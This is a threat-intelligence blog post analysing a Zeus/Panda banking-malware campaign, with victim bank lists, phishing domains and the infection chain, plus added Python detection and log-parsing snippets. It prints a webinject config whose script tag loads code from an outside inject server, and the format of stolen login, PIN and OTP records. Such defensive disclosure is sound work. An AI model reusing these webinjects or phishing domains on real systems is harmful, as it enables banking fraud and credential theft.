Banks and crypto wallets: unveiling a global malware campaign using Zeus/Panda

For the past weeks our Threat Intelligence team has been following an extensive campaign, possibly operated by a single group, targeting a large number of financial institutions, cryptocurrency wallets and the occasional Google and Apple accounts. The attackers target their victims with phishing emails, typo-squatted domains and malicious attachments that eventually lead to the installation of the Zeus/Panda banking malware. The group appears to have been active since at least 2015 and is most likely related to several campaigns identified by the security community in the past 3 years.

Update 1

This article was originally written in June 2018 and slightly updated over time; we decided not to publish any details because of the huge amount of sensitive data available and accessible on the drop zones. ReaQta alerted the financial institutions involved, the CERTs and the authorities of the countries affected by this attack. As of August 2018 the servers used to collect the data have finally gone down, and today we believe there is no longer any harm in publishing the details.

Update 2

The C2 sitergenis[.]com used to serve Ursnif.

Campaign Infrastructure

We identified a consistent stream of suspicious emails reaching our customers that eventually led us to the infrastructure used in these campaigns. In particular we focused our analysis on 2 campaigns, chosen for their longevity and the volumes involved.

The first part of the infrastructure that caught our attention has been up since 2015, followed by a dormant period that ended in February 2018; in the span of just 3 months over 24,000 sessions were stolen from the respective victims. Despite the large amount of activity, the C2 involved went largely unnoticed for years; below is a VirusTotal report on the domain used.

C2 front scan results

The following is an analysis of the data collected by the attackers starting from 2015 until the last days of May 2018, showing the large volume of transactions captured by the attackers.

Zeus/Panda First campaign identified

There’s a number of financial entities involved, in what appears to be a campaign focused on Italy (but don’t worry, it will get international in a moment). The servicelogin tag is a service shared by different financial institutions, large and small; in this case it represents an aggregate of sessions captured from victims belonging to these different entities.

First Campaign Entities Involved

The second part of the infrastructure has been active for almost a year, with the first signs of victim activity already in July 2017; in this case the URL appears completely clean, with no public detections.

C2 front scan results for second domain

The activity on this server is considerable, with a large focus on Italian financial customers, both on Personal and Business accounts.

Zeus/Panda Second Campaign Identified

Below we can see which Banks have been affected and the numbers involved.

Second Campaign Entities Involved

The victims we have been able to identify belong to the following financial institutions and related service providers:

  • Allianz Bank
  • Banca CR Firenze
  • Banca CR Veneto
  • Banca Fideuram
  • Banca Intermobiliare
  • Banca Popolare di Milano (BPM)
  • Banca Popolare di Sondrio
  • Banca Sella
  • Banca delle Marche
  • Banca dell’Adriatico
  • Banca di Credito Popolare
  • Banco di Napoli
  • Bancoposta (Poste Italiane)
  • BNL (Paribas group)
  • BPER Group
  • Cedacri
  • Consorzio Servizi Bancari (CSE)
  • Credito Emiliano (Credem)
  • Deutsche Bank Italia
  • Fineco Bank
  • Gruppo Carige
  • Intesa San Paolo
  • Monte dei Paschi di Siena (MPS)
  • Nexi ICBPI
  • Relax Banking
  • Tecmarket
  • UBI Banca
  • Unicredit

As mentioned above, although this campaign is aimed at the Italian market it does not stop there: the same infrastructure is used, and is still active, on hundreds of different domains related to international banks, cryptocurrency wallets and various typo-squatted or fake domains impersonating Apple and Google. In particular the front IP used for the first campaign also carries (or used to carry) dozens of domains of this kind, impersonating banks, wallets and online services, most of them observed between April and June 2018.


The attackers are currently targeting various financial entities worldwide: American Express, Lloyds Bank, ABN Amro, ING and Rabobank. Below is a phishing page currently active against Lloyds Bank:

Lloyds Bank phishing page, active at the time of writing.

The scope of the campaign is not limited to financial institutions; it also includes cryptocurrency wallets. Below is a comparison of the legitimate Electrum website versus the phishing version.

Phishing Electrum page, with an added login box
Real Electrum page

What’s interesting is that one of the first domain names pointing to the front IP address, back in November 2015, was adobeflashupdater.net; upon further digging, that domain turned out to be (surprise!) part of a more recent phishing campaign, and the related host was used to impersonate mostly Apple and Google and, for some reason, a Clinton-related domain, as shown below:

  • imap.maill.clintonemailhearing.com
  • imap.em.gmailssdf.com
  • icloudip-itunes.com
  • apple-ltunes-ios.com
  • apple-activated.com
  • google-cloud.pw
  • apple-ituens.com
  • apple-ins-server-icloud.com
  • apple-inc-server-icloud.com
  • appleid-find-usa.com
  • gov.0.56v.us (this has been used as the base domain for a DGA in a different campaign)

Of course the list is not final: the new Zeus/Panda samples we are gathering target new entities, and a new branch of the campaign is currently attacking banks in Northern and Eastern Europe, Asia and Australia.

Zeus/Panda New Campaign

Zeus/Panda Infection

Users that are directly attacked receive an email with an Office document containing a malicious macro.

Zeus/Panda Banker Phishing Attachment

The macro uses PowerShell to download and run the Zeus/Panda executable from one of the hosting domains. Below is a screenshot of the first stage taken from ReaQta-Hive, showing cmd.exe spawning from Excel and the related PowerShell script used in the document:

Zeus/Panda Office Infection – First Stage
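As an added illustration (not code from the original post or from ReaQta), here is a detection check over constructed process-creation events that flags the Excel -> cmd.exe -> PowerShell chain described above; the event layout and field names are assumptions.

```python
from dataclasses import dataclass
from typing import Dict, List

# Process names in the first stage described above: Office app -> cmd.exe -> PowerShell.
OFFICE_APPS = {"excel.exe", "winword.exe", "powerpnt.exe"}
INTERMEDIATE_SHELLS = {"cmd.exe", "wscript.exe", "cscript.exe"}
TARGET = "powershell.exe"

@dataclass
class ProcEvent:
    pid: int
    ppid: int
    image: str     # lowercase executable basename as an EDR or Sysmon would log it (assumed layout)
    cmdline: str

# Constructed sample: one chain matching the infection described above, plus a benign
# PowerShell launched from the desktop that must not be flagged.
SAMPLE_EVENTS = [
    ProcEvent(100, 1, "explorer.exe", "explorer.exe"),
    ProcEvent(200, 100, "excel.exe", "EXCEL.EXE invoice.xls"),
    ProcEvent(300, 200, "cmd.exe", "cmd /c powershell -w hidden -nop -c <downloader>"),
    ProcEvent(400, 300, "powershell.exe", "powershell -w hidden -nop -c <downloader>"),
    ProcEvent(500, 100, "powershell.exe", "powershell Get-Service"),
]

def office_to_powershell_chains(events: List[ProcEvent], max_depth: int = 3) -> List[List[str]]:
    """Return, oldest ancestor first, every chain in which powershell.exe descends from an
    Office application within max_depth hops, passing only through known script shells."""
    by_pid: Dict[int, ProcEvent] = {e.pid: e for e in events}
    hits: List[List[str]] = []
    for e in events:
        if e.image != TARGET:
            continue
        chain, parent = [e.image], by_pid.get(e.ppid)
        for _ in range(max_depth):
            if parent is None:
                break
            chain.append(parent.image)
            if parent.image in OFFICE_APPS:
                hits.append(list(reversed(chain)))
                break
            if parent.image not in INTERMEDIATE_SHELLS:
                break          # chain interrupted by something other than a script shell
            parent = by_pid.get(parent.ppid)
    return hits

if __name__ == "__main__":
    for chain in office_to_powershell_chains(SAMPLE_EVENTS):
        print("suspicious chain:", " -> ".join(chain))
```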

After the download, Zeus/Panda is executed (we split the incident into two parts for easier reading): it injects itself into svchost.exe, establishes registry persistence, downloads an encrypted VNC client and then begins its job of adding webinjects to the pages visited by the victim.

Zeus/Panda Office Infection – Second Stage

Webinjects are created both for financial accounts and for email accounts, while links to the support, security and reporting sections are blocked. They follow the well-known Zeus/Panda format and look like this:

Replace = https://www.<REDACTED>.it/it/*.html
Encoding = utf-8
Subject = <title><REDACTED>
Replacement = <script id="xks11" type="text/javascript" src="https://<REDACTED>/it/js.php?system=<REDACTED>&[email protected]@"></script> <script id="xks12"> document.getElementById("xks11").parentNode.removeChild(document.getElementById("xks11")); </script><title>UniCredit
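To show how an analyst turns such a webinject dump into blocklist material, here is an added example (not from the original post) that parses the entry layout shown above and pulls out the targeted URL patterns and the hosts the injected scripts load from; the config sample, its domains, query parameters and bank names are constructed.

```python
import re
from typing import Dict, List, Set
from urllib.parse import urlparse

# Constructed sample in the layout shown above; domains and bank names are made up
# (the real ones are redacted on the page).
SAMPLE_CONFIG = """\
Replace = https://www.bank-one.example/it/*.html
Encoding = utf-8
Subject = <title>Bank One
Replacement = <script id="xks11" type="text/javascript" src="https://inject.example/it/js.php?system=1&u=@@"></script> <script id="xks12"> document.getElementById("xks11").parentNode.removeChild(document.getElementById("xks11")); </script><title>Bank One

Replace = https://mail.provider.example/*
Encoding = utf-8
Subject = <body>
Replacement = <script src="https://inject.example/mail/js.php"></script><body>
"""

SRC_RE = re.compile(r'src\s*=\s*"([^"]+)"', re.IGNORECASE)

def parse_webinjects(text: str) -> List[Dict[str, str]]:
    """Split the config into blank-line separated entries of 'key = value' pairs.
    Only the first '=' separates key and value, since Replacement bodies contain '='."""
    entries: List[Dict[str, str]] = []
    current: Dict[str, str] = {}
    for line in text.splitlines():
        if not line.strip():
            if current:
                entries.append(current)
                current = {}
            continue
        key, sep, value = line.partition("=")
        if sep:
            current[key.strip()] = value.strip()
    if current:
        entries.append(current)
    return entries

def inject_hosts(entries: List[Dict[str, str]]) -> Set[str]:
    """Hosts the injected <script src> tags load from: the inject servers to block or hunt for."""
    return {urlparse(src).hostname
            for e in entries
            for src in SRC_RE.findall(e.get("Replacement", ""))}

def targeted_url_patterns(entries: List[Dict[str, str]]) -> List[str]:
    """URL patterns the bot replaces, i.e. the pages of the targeted institutions."""
    return [e["Replace"] for e in entries if "Replace" in e]
```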

The exfiltrated data includes, of course, the username/password combination and also the OTP PIN used during login:

151.xx.xx.xx |victim_user| 12:04:14 02.06.2018 | Bank: <REDACTED> | User:victim_user;PIN:12345;OTP:0000^https://www.<REDACTED>.com/
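As an added example (not from the original post), here is a parser for records in the layout shown above, written the way one would to group victims per bank for notification while discarding the stolen PIN and OTP values; the sample records, addresses and bank names are constructed.

```python
import re
from collections import Counter
from datetime import datetime
from typing import Dict, List, Optional

# Constructed sample records in the layout shown above (addresses, users, banks are made up).
SAMPLE_LOG = """\
151.0.0.1 |user_a| 12:04:14 02.06.2018 | Bank: BankOne | User:user_a;PIN:12345;OTP:0000^https://www.bankone.example/
151.0.0.2 |user_b| 12:05:01 02.06.2018 | Bank: BankTwo | User:user_b;PIN:54321;OTP:1111^https://www.banktwo.example/
151.0.0.3 |user_c| 09:10:00 03.06.2018 | Bank: BankOne | User:user_c;PIN:11111;OTP:2222^https://www.bankone.example/
garbage line that does not match the record layout
"""

# ip |user| HH:MM:SS DD.MM.YYYY | Bank: name | key:value;key:value^url
RECORD_RE = re.compile(
    r"^(?P<ip>\S+)\s*\|(?P<user>[^|]*)\|\s*(?P<ts>\d{2}:\d{2}:\d{2} \d{2}\.\d{2}\.\d{4})\s*\|"
    r"\s*Bank:\s*(?P<bank>[^|]*?)\s*\|\s*(?P<fields>[^^]*)\^(?P<url>\S+)$"
)
SECRET_KEYS = {"PIN", "OTP", "PASS", "PASSWORD"}

def parse_record(line: str) -> Optional[Dict[str, object]]:
    """Parse one record; secret values are never stored, only which kinds were stolen."""
    m = RECORD_RE.match(line.strip())
    if not m:
        return None
    fields = dict(kv.split(":", 1) for kv in m["fields"].split(";") if ":" in kv)
    return {
        "ip": m["ip"],
        "user": m["user"].strip(),
        "time": datetime.strptime(m["ts"], "%H:%M:%S %d.%m.%Y"),
        "bank": m["bank"],
        "url": m["url"],
        "stolen": sorted(k for k in fields if k.upper() in SECRET_KEYS),
    }

def parse_log(text: str) -> List[Dict[str, object]]:
    """Parse all records, silently skipping lines that do not match the layout."""
    return [r for r in (parse_record(l) for l in text.splitlines()) if r]

def victims_per_bank(records: List[Dict[str, object]]) -> Dict[str, int]:
    """Number of captured sessions per institution, the figure used for notification."""
    return dict(Counter(str(r["bank"]) for r in records))
```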

Unfortunately changing passwords won’t help the victims until their systems are cleaned of the malware and of the running VNC client.


Conclusions

The actors behind these campaigns are constantly active and capable of adapting extremely quickly. The number of entities targeted, the different languages and the scope suggest a large and well-structured group taking care of the different aspects of the operation. During our analysis we identified different entry points in Poland, Russia and China, directly operated by the group; this might indicate that actors from various countries are taking part in the same game (possibly also a merger of different criminal groups?). Whatever the case, users should be alert as usual and wary of unexpected documents, as they might contain malicious code capable of extracting personal and financial information from the affected devices.